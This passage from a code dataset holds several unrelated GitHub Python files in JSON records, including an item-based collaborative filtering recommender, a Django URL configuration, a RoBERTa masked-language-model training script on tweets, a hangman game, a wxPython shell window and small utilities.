'''\n if os.path.exists('ratings_item.txt') and os.path.exists('ratings_user.txt'):\n print('读取用户-物品矩阵...')\n with open('ratings_user.txt', 'rb') as f1:\n ratings_user = pickle.load(f1)\n with open('ratings_item.txt', 'rb') as f2:\n ratings_item = pickle.load(f2)\n else: \n ratings_user = dict()\n ratings_item = dict()\n print('开始创建用户-物品矩阵...')\n for _, row in tqdm(self.train_data.iterrows(),total=len(self.train_data)):\n user,item,rating = row['userID'],row['itemID'],row['Rating']\n if item not in ratings_item:\n ratings_item[item] = dict()\n ratings_item[item][user] = rating\n if user not in ratings_user:\n ratings_user[user] = dict()\n ratings_user[user][item] = rating\n\n print('用户-物品矩阵创建完毕!!!')\n with open('ratings_user.txt', 'wb') as f1:\n pickle.dump(ratings_user,f1)\n with open('ratings_item.txt', 'wb') as f2:\n pickle.dump(ratings_item,f2)\n\n if os.path.exists('item_similarity_matrix.txt'):\n print('读取物品相似度矩阵...')\n with open('item_similarity_matrix.txt','rb') as f3:\n similarity_matrix = pickle.load(f3)\n else:\n print('开始创建物品相似度矩阵...')\n # 相似度矩阵用二维数组储存,如果用字典保存,测试集评估会出现 key_error,比较麻烦\n similarity_matrix = -1 * np.ones(shape=(self.n_items,self.n_items))\n for itemx in tqdm(ratings_item, total=len(ratings_item)):\n for itemy in ratings_item:\n if itemy == itemx:\n continue\n itemxVec = []\n itemyVec = []\n itemx_history = set(ratings_item[itemx].keys())\n itemy_history = set(ratings_item[itemy].keys())\n intersection = itemx_history.intersection(itemy_history)\n for item in intersection:\n itemxVec.append(ratings_item[itemx][item])\n itemyVec.append(ratings_item[itemy][item])\n similarity_matrix[itemx][itemy] = 
similarity_matrix[itemy][itemx] = self.pearsonrSim(itemxVec,itemyVec)\n print('相似度矩阵构建完毕')\n with open('item_similarity_matrix.txt','wb') as f3:\n similarity_matrix = pickle.dump(similarity_matrix,f3)\n\n # 处理pearsonr相关系数为nan的值\n df = pd.DataFrame(similarity_matrix)\n df = df.fillna(0)\n similarity_matrix = df.to_numpy()\n del df\n\n # 计算每个物品的平均评分,用于消除用户评分偏置\n avg_item_ratings = np.zeros(self.n_items)\n for item,rate_list in ratings_item.items():\n avg_rating = np.mean([rate for rate in rate_list.values()])\n avg_item_ratings[item] = avg_rating\n\n # 生成TopN推荐列表\n # 要预测的物品就是用户没有评分过的物品\n # 先筛选出用户交互过的商品\n # 再选出与这些物品最相似的K个物品,并且过滤掉用户已经交互过的物品\n # 再根据用户交互过的商品的得分,计算目标物品的得分\n # 对这些items得分降序排列\n val_users_set = set(self.valid_users.keys())\n rec_dict = dict()\n factor = dict()\n print('给用户进行推荐...')\n for user in tqdm(val_users_set, total=len(val_users_set)):\n rec_dict[user] = dict() # 该用户的推荐物品得分字典\n factor[user] = dict() # 分母\n user_history = ratings_user[user].keys()\n for item in user_history: # 选出与用户交互过的物品最相似的K个物品\n similar_items_idx = np.argsort(-similarity_matrix[item])[:K]\n similarity_of_items = similarity_matrix[item][similar_items_idx]\n for iitem, score in zip(similar_items_idx, similarity_of_items):\n if iitem not in user_history: # 过滤掉用户已经交互过的物品\n if iitem not in rec_dict[user]:\n rec_dict[user][iitem] = 0\n if iitem not in factor[user]:\n factor[user][iitem] = 0\n #rec_dict[user][iitem] += score * (ratings_user[user][item] - avg_item_ratings[item]) # 含偏置\n rec_dict[user][iitem] += score * ratings_user[user][item] # 不含偏置\n factor[user][iitem] += score\n for item_idx,rank_score in rec_dict[user].items():\n #rank_score += avg_item_ratings[item_idx] # 含偏置\n rank_score /= factor[user][item_idx]\n rec_dict[user][item_idx] = rank_score\n print('为每个用户筛选出相似度分数最高的N个商品...')\n self.TopN_rec_dict = {k: sorted(v.items(), key=lambda x: x[1], reverse=True)[:N] for k, v in rec_dict.items()}\n self.TopN_rec_dict = {k: set([x[0] for x in v]) for k, v in self.TopN_rec_dict.items()}\n self.rec_dict = rec_dict\n\n\n def Cosine_Item_CF(self, K, N):\n '''\n train_users: 表示训练数据,格式为:{user_id1: [item_id1, item_id2,...,item_idn], user_id2...}\n valid_users: 表示验证数据,格式为:{user_id1: [item_id1, item_id2,...,item_idn], user_id2...}\n K: K表示的是相似商品的数量,为每个用户交互的每个商品都选择其最相思的K个商品\n N: N表示的是给用户推荐的商品数量,给每个用户推荐相似度最大的N个商品\n '''\n\n # 建立user->item的倒排表\n # 倒排表的格式为: {user_id1: [item_id1, item_id2,...,item_idn], user_id2: ...} 也就是每个用户交互过的所有商品集合\n # 由于输入的训练数据train_users,本身就是这中格式的,所以这里不需要进行额外的计算\n \n\n # 只要物品u,v共同被某个用户交互过,它们之间的相似度就 +1 ---> 协同过滤矩阵\n # 最后再除以 sqrt(N(u)*N(v)) ---> 相似度矩阵\n\n\n # 计算商品协同过滤矩阵 \n # 即利用user-items倒排表统计商品与商品之间被共同的用户交互的次数\n # 商品协同过滤矩阵的表示形式为:sim = {item_id1: {item_id2: num1}, item_id3: {item_id4: num2}, ...}\n # 商品协同过滤矩阵是一个双层的字典,用来表示商品之间共同交互的用户数量\n # 在计算商品协同过滤矩阵的同时还需要记录每个商品被多少不同用户交互的次数,其表示形式为: num = {item_id1:num1, item_id2:num2, ...}\n sim = {}\n num = {}\n print('构建相似性矩阵...')\n for uid, items in tqdm(self.train_users.items()):\n for i in items: \n if i not in num:\n num[i] = 0\n num[i] += 1\n if i not in sim:\n sim[i] = {}\n for j in items:\n if j not in sim[i]:\n sim[i][j] = 0\n if i != j:\n sim[i][j] += 1\n \n # 计算物品的相似度矩阵 step 2\n # 商品协同过滤矩阵其实相当于是余弦相似度的分子部分,还需要除以分母,即两个商品被交互的用户数量的乘积\n # 两个商品被交互的用户数量就是上面统计的num字典\n print('计算协同过滤矩阵...')\n for i, items in tqdm(sim.items()):\n for j, score in items.items():\n if i != j:\n sim[i][j] = score / math.sqrt(num[i] * num[j])\n \n\n # 对验证数据中的每个用户进行TopN推荐\n # 在对用户进行推荐之前需要先通过商品相似度矩阵得到当前用户交互过的商品最相似的前K个商品,\n # 然后选出其中目标用户没有交互过的商品,计算最终的相似度分数\n # 
The final similarity score of a candidate item is the accumulated sum of the scores contributed to it by several similar items\n pre_dict = {}\n print('Generating recommendations for users...')\n for uid, _ in tqdm(self.valid_users.items()):\n pre_dict[uid] = {} # store the candidate recommended items for this user\n for hist_item in self.train_users[uid]: # iterate over the items this user liked historically, used below to find similar items\n for item, score in sorted(sim[hist_item].items(), key=lambda x: x[1], reverse=True)[:K]:\n if item not in self.train_users[uid]: # recommended items must never appear among the historically liked items\n if item not in pre_dict[uid]:\n pre_dict[uid][item] = 0\n pre_dict[uid][item] += score\n \n print('Selecting the N items with the highest similarity scores for each user...')\n TopN_rec_dict = {k: sorted(v.items(), key=lambda x: x[1], reverse=True)[:N] for k, v in pre_dict.items()}\n self.TopN_rec_dict = {k: set([x[0] for x in v]) for k, v in TopN_rec_dict.items()}\n\n\n def predict(self, TopK, TopN):\n if self.mode == 'cosine':\n self.Cosine_Item_CF(TopK, TopN)\n elif self.mode =='pearsonr':\n self.Pearsonr_ItemCF(TopK, TopN)\n\n def eval(self,rmse=True):\n \"\"\"\n rec_dict: recommendation lists returned by the algorithm, in the form {uid: {item1, item2,...}, uid: {item1, item2,...}, ...} \n val_users: items the users actually clicked, in the form {uid: {item1, item2,...}, uid: {item1, item2,...}, ...}\n tra_users: items actually clicked in the training set, in the form {uid: {item1, item2,...}, uid: {item1, item2,...}, ...}\n \"\"\"\n if rmse:\n pre_list = []\n rel_list = []\n for idx,row in self.valid_data.iterrows():\n userID,itemID,Rating,_ = row\n rel_list.append(Rating)\n if userID in self.rec_dict:\n if itemID in self.rec_dict[userID]:\n pre_list.append(self.rec_dict[userID][itemID])\n continue\n pre_list.append(0)\n _rmse = RMSE(rel_list, pre_list)\n print(f'Root mean squared error RMSE: {round(_rmse,5)}')\n\n print('recall:',Recall(self.TopN_rec_dict, self.valid_users))\n print('precision',Precision(self.TopN_rec_dict, self.valid_users))\n print('coverage',Coverage(self.TopN_rec_dict, self.train_users))\n print('Popularity',Popularity(self.TopN_rec_dict, self.train_users))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--TopN', type=int, default=10, help='number of top score items selected')\n parser.add_argument('--TopK', type=int, default=10, help='number of similar items/users')\n parser.add_argument('--rmse', action='store_false', help='rmse')\n parser.add_argument('--mode', type=str, default='cosine', help='choose mode:cosine,pearsonr')\n args = parser.parse_args()\n\n model = ItemCF('../dataset/ml-1m', args.mode)\n model.predict(args.TopK, args.TopN)\n model.eval(rmse=args.rmse)\n\n\n ","repo_name":"Guadzilla/Basics-of-Recsys","sub_path":"task4/ItemCF.py","file_name":"ItemCF.py","file_ext":"py","file_size_in_byte":13357,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"8360431333","text":"# -*- coding:utf-8 -*-\r\n# project_xxx\\venv\\Scripts python\r\n\r\n'''\r\nAuthor: Felix\r\nWeiXin: AXiaShuBai\r\nEmail: xiashubai@gmail.com\r\nBlog: https://blog.csdn.net/u011318077\r\nGihHub: https://github.com/FelixZFB\r\nDate: 2020/4/26 11:04\r\nDesc:\r\n'''\r\n\r\nfrom django.conf.urls import url # import the url function\r\n# Note on this import: because both the test1 and test2 project folders are marked as source root,\r\n# searching for booktest finds the one under test1 first, so the imported views would be the one from test1\r\n# Solution: avoid using the same name in different projects\r\n# Workaround: remove the source root mark from test1 and test2\r\nfrom booktest import views # import the views module\r\n\r\n\r\n# Notes on the configuration in the app's urls file:\r\n# 1. Match the beginning and the end of the url strictly\r\n# http://127.0.0.1:8000/index matching starts after the site root /\r\n\r\nurlpatterns = [\r\n # r marks a raw string, ^ matches from the start of the string\r\n # The first argument is a regular expression, the second is the handler called when the url matches\r\n url(r'^index$', views.index, name='index'), # bind the url to the view function; the name parameter is matched dynamically against the pattern for reverse resolution\r\n url(r'^index1$', views.index1), # bind the url to the view function\r\n url(r'^temp_tags$', views.temp_tags), # template tags usage\r\n url(r'^temp_inherit$', 
views.temp_inherit), # template inheritance\r\n url(r'^temp_escape$', views.temp_escape), # template escaping\r\n url(r'^login$',views.login), # show the login page\r\n url(r'^login_check$',views.login_check), # validate the user\r\n url(r'^change_pwd$',views.change_pwd), # show the change-password page\r\n url(r'^change_pwd_action$',views.change_pwd_action), # handle the password change\r\n url(r'^url_reverse$',views.url_reverse), # url reverse-resolution page, reverse-resolves the index page\r\n url(r'^show_args/(\\d+)/(\\d+)$',views.show_args, name='show_args'), # capture positional arguments\r\n url(r'^show_kwargs/(?P<num1>\\d+)/(?P<num2>\\d+)$',views.show_kwargs, name='show_kwargs'), # capture keyword arguments; ?P<num1> names the captured key num1, i.e. a named regex group\r\n url(r'^test_redirect$',views.test_redirect), # url reverse resolution inside a view\r\n\r\n url(r'^static_test$',views.static_test), # static files usage\r\n url(r'^index2$',views.index2), # home page 2\r\n url(r'^index3$',views.index3), # home page 3\r\n\r\n url(r'^pic_upload$', views.pic_upload), # image upload page\r\n url(r'^pic_handle$', views.pic_handle), # save the uploaded image into a folder\r\n\r\n # use a named group; \\d* matches zero or more digits\r\n url(r'^show_area/(?P<pageindex>\\d*)$', views.show_area), # show area information\r\n url(r'^areas$', views.areas), # province/city/district selection\r\n url(r'^prov$', views.prov), # get all province-level areas, returned as json data\r\n url(r'^city/(\\d+)$', views.city), # get the city-level areas under a province\r\n url(r'^dis/(\\d+)$', views.city), # get the county-level areas under a city; both queries go through the parent ID, so the same view function as for cities is reused\r\n\r\n]\r\n\r\n\r\n# Note: during matching, the patterns in urlpatterns are matched against the part extracted from the url\r\n# Matching goes from top to bottom and stops at the first match\r\n# If index2 is requested, the pattern index would also match index2\r\n# So we match strictly from the start ^ to the end $ of the string to guarantee consistency\r\n\r\n# Steps when visiting http://127.0.0.1:8000/index:\r\n# 1. The browser requests the url and django automatically extracts the part after /, i.e. index\r\n# 2. index is first matched in order against the urlpatterns in the project's test4/urls\r\n# 3. r'' matches anything, so matching then continues in booktest.urls\r\n# 4. url(r'^index', views.index) matches, and the view method views.index is called\r\n# 5. The result of the index method is returned and displayed in the page\r\n\r\n# First start the server: python manage.py runserver\r\n# Then open the page above: http://127.0.0.1:8000/index","repo_name":"FelixZFB/Django_2020","sub_path":"03_test4/test4/booktest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38475688700","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#get_ipython().system('nvidia-smi')\n\n\n# In[2]:\n\n\nimport os\nimport pandas as pd\nimport tqdm\nimport math\n\n\n# In[3]:\n\n\n# from google.colab import drive\n\n# drive.mount('/content/drive', force_remount=True)\n\n\n# In[4]:\n\n\n# from google.colab import auth\n# auth.authenticate_user()\n\n# import gspread\n# from oauth2client.client import GoogleCredentials\n\n# gc = gspread.authorize(GoogleCredentials.get_application_default())\n\n\n# In[5]:\n\n\n# worksheet = gc.open('Tweets_Spring_Summer_2021_coded').sheet1\n\n# sheet_data = worksheet.get_all_values()\n# df = pd.DataFrame.from_records(sheet_data[1:], columns=sheet_data[0])\n# # print('Num examples:', len(df))\n# # print('Null Values\\n', df.isna().sum())\n# # df.dropna(inplace=True)\n# # print('Num examples:', len(df))\n\n# # in the tweets find the hashtag\n# df['hashTags'] = df['Tweet'].str.findall(\"#(\\w+)\")\n# # in the tweets find the mentions\n# df['mentions'] = df['Tweet'].str.findall(\"@(\\w+)\")\n\n# # Remove hashtag and mentions\n# df['Tweet'] = df['Tweet'].str.replace(r'#(\\w+)', '', regex=True)\n# df['Tweet'] = df['Tweet'].str.replace(r'@(\\w+)', '', regex=True)\n\n# df\n\n\n# In[6]:\n\n\n#df1 =pd.read_csv('20161006.csv',lineterminator='\\n',skipinitialspace=True, usecols= ['text'])\n#df2 =pd.read_csv('20161007.csv',lineterminator='\\n',skipinitialspace=True, usecols= ['text'])\ndf =pd.read_csv('2020_01_01.csv',lineterminator='\\n',skipinitialspace=True, usecols= ['text'])\n\n\n# frame = [df1, df2]\n# df = 
pd.concat(frame)\ndf.rename(columns={'text':'Tweet'}, inplace=True)\ndf.shape\n\n\n# In[7]:\n\n\ndf = df.dropna()\n\n\n# In[8]:\n\n\ndf.shape\n\n\n# In[9]:\n\n\n#Set the path to the data folder, datafile and output folder and files\nroot_folder = '/users/kent/jmaharja/drugAbuse'\n# data_folder = os.path.abspath(os.path.join(root_folder, 'datasets/text_gen_product_names'))\nmodel_folder = os.path.abspath(os.path.join(root_folder, 'output/Drug-Abuse/RoBERTaMLM/'))\noutput_folder = os.path.abspath(os.path.join(root_folder, 'output/Drug-Abuse'))\ntokenizer_folder = os.path.abspath(os.path.join(root_folder, 'output/Drug-Abuse/TokRoBERTa/'))\n\n# test_filename='Tweets_Spring_Summer_2021_coded'\n# datafile= 'product_names_desc_cl_train.csv'\noutputfile = 'submission.csv'\n\n# datafile_path = os.path.abspath(os.path.join(data_folder,datafile))\n# testfile_path = os.path.abspath(os.path.join(data_folder,test_filename))\noutputfile_path = os.path.abspath(os.path.join(output_folder,outputfile))\n\n\n# Build a Tokenizer\n\n# In[10]:\n\n\n# Drop the files from the output dir\n# txt_files_dir = \"./text_split_2020\"\n# !rm -rf {txt_files_dir}\n# !mkdir {txt_files_dir}\n\n\n# In[11]:\n\n\n# Store values in a dataframe column (Series object) to files, one file per record\ndef column_to_files(column, prefix, txt_files_dir):\n # The prefix is a unique ID to avoid to overwrite a text file\n i=prefix\n #For every value in the df, with just one column\n for row in column.to_list():\n # Create the filename using the prefix ID\n file_name = os.path.join(txt_files_dir, str(i)+'.txt')\n try:\n # Create the file and write the column text to it\n f = open(file_name, 'wb')\n f.write(row.encode('utf-8'))\n f.close()\n except Exception as e: #catch exceptions(for eg. empty rows)\n print(row, e) \n i+=1\n # Return the last ID\n return i\n\n\n# In[12]:\n\n\ndata = df[\"Tweet\"]\n# Removing the end of line character \\n\ndata = data.replace(\"\\n\",\" \")\n# Set the ID to 0\nprefix=0\n# Create a file for every description value\n# prefix = column_to_files(data, prefix, txt_files_dir)\n# # Print the last ID\n# print(prefix)\n\n\n# Train the tokenizer\n# \n\n# In[13]:\n\n\nfrom pathlib import Path\n\nfrom tokenizers import ByteLevelBPETokenizer\nfrom tokenizers.processors import BertProcessing\n\nimport torch\nfrom torch.utils.data.dataset import Dataset\n\n\n# In[14]:\n\n\n#get_ipython().run_cell_magic('time', '', 'paths = [str(x) for x in Path(\".\").glob(\"text_split/*.txt\")]\\n\\n# Initialize a tokenizer\\ntokenizer = ByteLevelBPETokenizer(lowercase=True)\\n\\n# Customize training\\ntokenizer.train(files=paths, vocab_size=8192, min_frequency=2,\\n show_progress=True,\\n special_tokens=[\\n \"<s>\",\\n \"<pad>\",\\n \"</s>\",\\n \"<unk>\",\\n \"<mask>\",\\n])')\n#time \npaths = [str(x) for x in Path(\".\").glob(\"text_split/*.txt\")]\n\n# Initialize a tokenizer\ntokenizer = ByteLevelBPETokenizer(lowercase=True)\n\n# Customize training\ntokenizer.train(files=paths, vocab_size=8192, min_frequency=2,\n show_progress=True,\n special_tokens=[\n \"<s>\",\n \"<pad>\",\n \"</s>\",\n \"<unk>\",\n \"<mask>\",\n])\n\n# In[ ]:\n\n\n#Save the Tokenizer to disk\ntokenizer.save_model(tokenizer_folder)\n\n\n# In[15]:\n\n\n# Create the tokenizer using vocab.json and mrege.txt files\ntokenizer = ByteLevelBPETokenizer(\n os.path.abspath(os.path.join(tokenizer_folder,'vocab.json')),\n os.path.abspath(os.path.join(tokenizer_folder,'merges.txt'))\n)\n\n\n# In[16]:\n\n\n# Prepare the tokenizer\ntokenizer._tokenizer.post_processor = 
BertProcessing(\n (\"</s>\", tokenizer.token_to_id(\"</s>\")),\n (\"<s>\", tokenizer.token_to_id(\"<s>\")),\n)\ntokenizer.enable_truncation(max_length=512)\n\n\n# In[17]:\n\n\ntokenizer.encode(\"cook some blue.\")\n\n\n# In[18]:\n\n\ntokenizer.encode(\"cook some blue.\").tokens\n\n\n# Train a language model from scratch\n# \n# \n\n# In[19]:\n\n\nTRAIN_BATCH_SIZE = 16 # input batch size for training (default: 64)\nVALID_BATCH_SIZE = 8 # input batch size for testing (default: 1000)\nTRAIN_EPOCHS = 15 # number of epochs to train (default: 10)\nLEARNING_RATE = 1e-4 # learning rate (default: 0.001)\nWEIGHT_DECAY = 0.01\nSEED = 42 # random seed (default: 42)\nMAX_LEN = 128\nSUMMARY_LEN = 7\n\n\n# In[20]:\n\n\n# Check that PyTorch sees it\nimport torch\ntorch.cuda.is_available()\n\n\n# In[21]:\n\n\nfrom transformers import RobertaConfig\n\nconfig = RobertaConfig(\n vocab_size=8192,\n max_position_embeddings=514,\n num_attention_heads=12,\n num_hidden_layers=6,\n type_vocab_size=1,\n)\n\n\n# In[22]:\n\n\nfrom transformers import RobertaForMaskedLM\n\nmodel = RobertaForMaskedLM(config=config)\nprint('Num parameters: ',model.num_parameters())\n\n\n# In[23]:\n\n\nfrom transformers import RobertaTokenizerFast\n# Create the tokenizer from a trained one\ntokenizer = RobertaTokenizerFast.from_pretrained(tokenizer_folder, max_len=MAX_LEN)\n\n\n# In[24]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nRANDOM_SEED = 42\ntrain_df, test_df = train_test_split(df, test_size=0.1, random_state=RANDOM_SEED)\nval_df, test_df = train_test_split(test_df, test_size=0.5, random_state=RANDOM_SEED)\n\n\n# Building the training Dataset\n\n# In[25]:\n\n\nclass CustomDataset(Dataset):\n def __init__(self, df, tokenizer):\n # or use the RobertaTokenizer from `transformers` directly.\n\n self.examples = []\n \n for example in df.values:\n x=tokenizer.encode_plus(example, max_length = MAX_LEN, truncation=True, padding=True)\n self.examples += [x.input_ids]\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n # We’ll pad at the batch level.\n return torch.tensor(self.examples[i])\n\n\n# In[26]:\n\n\n# Create the train and evaluation dataset\ntrain_dataset = CustomDataset(train_df['Tweet'], tokenizer)\neval_dataset = CustomDataset(test_df['Tweet'], tokenizer)\n\n\n# In[27]:\n\n\nfrom transformers import DataCollatorForLanguageModeling\n\n# Define the Data Collator\ndata_collator = DataCollatorForLanguageModeling(\n tokenizer=tokenizer, mlm=True, mlm_probability=0.15\n)\n\n\n# In[28]:\n\n\nfrom torch import nn\nfrom transformers import Trainer, TrainingArguments\n\n\n# In[29]:\n\n\n#from transformers import Trainer, TrainingArguments\n\nprint(model_folder)\n# Define the training arguments\ntraining_args = TrainingArguments(\n output_dir=model_folder,\n overwrite_output_dir=True,\n evaluation_strategy = 'epoch',\n num_train_epochs=TRAIN_EPOCHS,\n learning_rate=LEARNING_RATE,\n weight_decay=WEIGHT_DECAY,\n per_device_train_batch_size=TRAIN_BATCH_SIZE,\n per_device_eval_batch_size=VALID_BATCH_SIZE,\n save_steps=8192,\n #eval_steps=4096,\n save_total_limit=1,\n)\n# Create the trainer for our model\ntrainer = Trainer(\n model=model,\n args=training_args,\n data_collator=data_collator,\n train_dataset=train_dataset,\n eval_dataset=eval_dataset,\n #prediction_loss_only=True,\n)\n\n\n# In[ ]:\n\n\n# Train the model\ntrainer.train()\n\n\n# In[ ]:\n\n\neval_results = trainer.evaluate()\nprint(f\"Perplexity: {math.exp(eval_results['eval_loss']):.2f}\")\n\n\n# In[ 
]:\n\n\ntrainer.save_model(model_folder)\n\n\n# In[ ]:\n\n\ntokenizer_folder\n\n\n# In[ ]:\n\n\nfrom transformers import pipeline\n\nfill_mask = pipeline(\n \"fill-mask\",\n model=model_folder,\n tokenizer=tokenizer_folder\n)\n\n\n# In[ ]:\n\n\nfill_mask(\"Alcohol and drugs is good for the <mask>\")\n\n\n# In[ ]:\n\n\n\n\n\n","repo_name":"JulinaM/robertaForTweetAnalysis","sub_path":"temp/test_scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25165687158","text":"puzzle = \"alma\" # Kitalálandó szó\nmegoldas = \"\" # A játékos megoldása\nfor x in puzzle: # végigmegy a kitalálandó szavat és kitölti csillagokkal\n if x == \" \":\n megoldas += \" \"\n else:\n megoldas += \"*\"\ncorrect = [] # Helyes betük listája\nincorrect = [] # Helytelen betük\nlifes = 10 # Probálkozások száma\n\n\ndef Elet():\n global lifes\n lifes -= 1\n print(f\"{lifes} élet van hátra.\")\n\n\nwhile puzzle != megoldas and lifes > 0: # Fő játék ciklus\n print(megoldas) # Ki írja a jelenlegi tippet\n print(correct)\n print(incorrect)\n tipp = input(\"Tippelj egy betűt:\\n> \")\n if len(tipp) == len(puzzle): # Ha a karakterek száma ugyan annyi\n temp = megoldas # Ideglenesen eltárolja a megoldást, hogy később visszaálithassa\n megoldas = tipp # A tippet átrakja a megoldásba, hiszen a program azzal ellenőrzi\n print(\"Megpróbáltál tippelni\")\n if megoldas == puzzle:\n print(\"Helyes Válasz\")\n else:\n print(\"Ez helytelen. (-1 élet.)\")\n megoldas = temp\n Elet()\n else:\n talalat = False\n for b in range(len(puzzle)):\n if b == puzzle[b]:\n megoldas_lista = list(megoldas)\n megoldas_lista[b] = tipp\n megoldas = \"\".join(megoldas_lista)\n talalat = True\n if not talalat:\n print(\"Ilyen betű nincsen. 
(-1 Élet.)\")\n incorrect.append(tipp)\n Elet()\n else:\n correct.append(tipp) # megnézi hogy vannak-e helyes betűk\nif lifes > 0:\n print(\"Nyertél!\")\nelse:\n print(\"Vesztettél\")\n","repo_name":"Petint/python-archhives","sub_path":"lsc/Python 1/kasztófa.py","file_name":"kasztófa.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40812303502","text":"import wx\nimport os\n\nclass ShellFrame(wx.Frame):\n\n def __init__(self, shell):\n self.app = wx.App(False)\n wx.Frame.__init__(self, None, title=\"OS Shell\", size=(450, 300))\n self.shell = shell\n self.historyIndex = 0\n self.SetBackgroundColour(wx.BLACK)\n self.initComponents()\n self.initEvents()\n self.Centre()\n self.Show(True)\n\n def initComponents(self):\n self.txtHistory = wx.TextCtrl(self, style=wx.TE_MULTILINE | wx.TE_READONLY)\n self.txtHistory.SetBackgroundColour(wx.BLACK)\n self.txtHistory.SetForegroundColour(wx.WHITE)\n self.txtHistory.Refresh()\n self.txtCommand = wx.TextCtrl(self, style=wx.TE_PROCESS_ENTER)\n self.txtCommand.SetBackgroundColour(wx.BLACK)\n self.txtCommand.SetForegroundColour(wx.WHITE)\n self.txtCommand.Refresh()\n self.txtCommand.SetFocus()\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.txtHistory, 1, wx.EXPAND)\n sizer.Add(self.txtCommand, 0, wx.EXPAND)\n self.SetSizer(sizer)\n self.SetAutoLayout(1)\n\n def initEvents(self):\n self.Bind(wx.EVT_TEXT_ENTER, self.onEnterCommand, self.txtCommand)\n self.Bind(wx.EVT_CHAR_HOOK, self.onKeyPressed, self.txtCommand)\n\n def onEnterCommand(self, event):\n command = event.GetString()\n self.printLn(\"> \" + command)\n if command and not self.shell.runCommand(command):\n self.printLn(\"No command '\" + command + \"' found.\")\n self.txtCommand.Clear()\n self.historyIndex = 0\n\n def onKeyPressed(self, event):\n if event.GetKeyCode() == wx.WXK_DOWN:\n self.showNextCommand()\n elif event.GetKeyCode() == wx.WXK_UP:\n self.showPrevCommand()\n else:\n event.Skip()\n\n def showPrevCommand(self):\n try:\n command = self.shell.history[self.historyIndex - 1]\n self.historyIndex = self.historyIndex - 1\n self.showCommand(command)\n except IndexError:\n pass\n\n def showNextCommand(self):\n index = self.historyIndex + 1\n if index == 0:\n self.showCommand(\"\")\n self.historyIndex = index\n elif index < 0:\n command = self.shell.history[index]\n self.showCommand(command)\n self.historyIndex = index\n\n def showCommand(self, command):\n self.txtCommand.Clear()\n self.txtCommand.AppendText(command)\n\n def printLn(self, text):\n self.txtHistory.AppendText(text)\n self.txtHistory.AppendText(os.linesep)\n\n def start(self):\n self.app.MainLoop()\n","repo_name":"hslavich/pyshell","sub_path":"pyshell/gui/shellframe.py","file_name":"shellframe.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18384143452","text":"def pre_order(n):\n if n:\n print(chr(n+64),end='')\n pre_order(left[n])\n pre_order(right[n])\ndef in_order(n):\n if n:\n in_order(left[n])\n print(chr(n+64),end='')\n in_order(right[n])\ndef post_order(n):\n if n:\n post_order(left[n])\n post_order(right[n])\n print(chr(n+64),end='')\n\nN = int(input())\nleft =[0]*27\nright =[0]*27\n\nfor ts in range(N):\n p,l,r = input().split()\n if l!=\".\":\n left[ord(p)-64] = ord(l)-64\n if r!=\".\":\n right[ord(p)-64]= ord(r)-64\n \npre_order(1)\nprint()\nin_order(1)\nprint()\npost_order(1)\n\n# print(ord('A'))# 
65\n","repo_name":"bbnerino/Algolithm","sub_path":"Study/stack_Q/1991_트리순회.py","file_name":"1991_트리순회.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24152423428","text":"import numpy as np\nimport json\n\ndef save_hyper(feat_type, add_bias, lr, reg_const):\n '''\n Saves the parameters tuned for different sub-problems of the assignment into a file.\n This file is later used for evaluation purposes.\n '''\n \n prob_dict = dict()\n prob_dict['add_bias'] = add_bias\n prob_dict['lr'] = lr\n prob_dict['reg_const'] = reg_const\n\n filename = 'hyper_param.json'\n \n try:\n with open(filename, 'r') as fp:\n dict_hyper = json.load(fp)\n except:\n dict_hyper = dict()\n\n dict_hyper[feat_type] = prob_dict\n with open(filename, 'w') as fp:\n json.dump(dict_hyper, fp)\n","repo_name":"abhigupta768/CSE-231N-AI_assignments","sub_path":"Assignment_3/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"24178161254","text":"import json\nfrom topo.topo import Topo\n\nclass OSPF(Topo):\n def load_from_file(self, filename):\n with open(filename, 'r') as f:\n for line in f: \n if line.startswith('#'): continue\n tokens = line.strip('\\n').split('|')\n assert len(tokens) >= 3\n node1, node2, w = int(tokens[0]), int(tokens[1]), int(tokens[2])\n link = list(sorted([node1, node2]))\n node1_ins = self.add_node(node1)\n node2_ins = self.add_node(node2)\n node1_ins.connect(node2_ins, {'w': w})\n node2_ins.connect(node1_ins, {'w': w})\n self.link_list.append((link[0], link[1]))","repo_name":"chenzibin2019/incremental-network-verification","sub_path":"topo/ospf.py","file_name":"ospf.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"35752921909","text":"'''\nExtra Long Factorials\nQuestion: https://www.hackerrank.com/challenges/extra-long-factorials/problem\n'''\nimport sys\n\ndef extraLongFactorials(n):\n # Complete this function\n fact=n\n while n!=1:\n fact=fact * (n-1)\n n=n-1\n print (fact)\n\nif __name__ == \"__main__\":\n n = int(input().strip())\n extraLongFactorials(n)\n","repo_name":"abhijitbangera/hackerrank_python","sub_path":"Medium_Extra_Long_Factorials.py","file_name":"Medium_Extra_Long_Factorials.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"75240716167","text":"# -*- coding: utf-8 -*-\n# @Author: Administrator\n# @Date: 2020-02-25 12:18:05\n# @Last Modified by: Administrator\n# @Last 